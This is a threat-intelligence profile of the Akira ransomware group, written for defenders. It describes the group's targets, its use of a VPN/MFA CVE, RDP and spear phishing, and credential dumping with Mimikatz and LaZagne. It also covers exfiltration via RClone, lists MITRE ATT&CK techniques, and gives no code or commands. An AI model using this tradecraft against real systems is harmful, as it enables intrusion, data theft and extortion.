Akira Group | |
Additional Names | Storm-1567, GOLD SAHARA, PUNK SPIDER |
Date of Initial Activity | 2023 |
Location | Unknown |
Suspected Attribution | Ransomware Group |
Motivation | FInancial Gain |
Software | Servers |
Overview
The Akira Group has emerged as a notable player in the ransomware landscape since its operations began in March 2023. Characterized by a unique retro aesthetic on their data leak site, this group quickly gained attention for its sophisticated and aggressive approach to cyber extortion. Utilizing multi-extortion tactics, the Akira Group not only encrypts victims’ data but also threatens to release sensitive information on their TOR-based website if ransom demands are not met. This layered approach intensifies the pressure on victims, often leading to significant financial losses.
Targeting a diverse range of sectors, including education, finance, manufacturing, real estate, and healthcare, the Akira Group does not discriminate when it comes to selecting its victims. Their operations are marked by a striking lack of specificity, as they primarily focus on large enterprises, leveraging vulnerabilities in public-facing applications and services to gain initial access. This indiscriminate targeting has raised alarms across industries, as organizations scramble to bolster their defenses against this evolving threat.
Technically, the Akira Group employs a series of sophisticated methods to infiltrate systems, often exploiting weaknesses in multi-factor authentication (MFA) and known vulnerabilities in Virtual Private Network (VPN) software. Once inside, they use advanced tools and techniques to move laterally within the network, dumping credentials and escalating privileges as necessary. The group has gained notoriety for its use of PowerShell commands to execute critical ransomware payloads, remove volume shadow copies, and encrypt files, all while employing clever evasion tactics to avoid detection.
Common Targets
- Information
- Retail Trade
- Finance and Insurance
- Educational Services
- Health Care and Social Assistance
Attack vectors
Software Vulnerabilities
How they work
Initial Access
The initial foothold on the system is obtained via several methods. Multi-factor authentication (MFA) exploitation (i.e. CVE-2023-20269) is mostly used in observed campaigns, along with known vulnerabilities in public facing services, such as RDP. Spear phishing is also used to gain a foothold, which is generally more effective than plain phishing, as it’s addressed to a specific user (group) and/or a relevant theme for the recipient(s).
Escalation and Lateral Movement
To escalate privileges and/or move laterally, LSASS dumps are used. Additionally, or alternatively, RDP is used to connect to other machines within the network while moving laterally. Other tools used are PCHunter64, LaZagne, and Mimikatz.
Data Collection and Exfiltration
Once the actors are in the system, data is exfiltrated by the actor. This way, the victim can be extorted twice: once to recover encrypted files, and once to ensure the stolen data is not made available publicly on the Akira extortion blog. To upload the gathered files, RClone, WinSCP, and FileZilla have been observed in use.
MITRE ATT&CK Techniques
T1003.001 OS Credential Dumping: LSASS Memory
T1048 Exfiltration Over Alternative Protocol
T1021.001 Remote Services: Remote Desktop Protocol
T1059.001 Command and Scripting Interpreter: PowerShell
T1106 Native API
T1190 Exploit Public-Facing Application
T1486 Data Encrypted for Impact
T1490 Inhibit System Recovery
T1566 Phishing
T1584 Compromise Infrastructure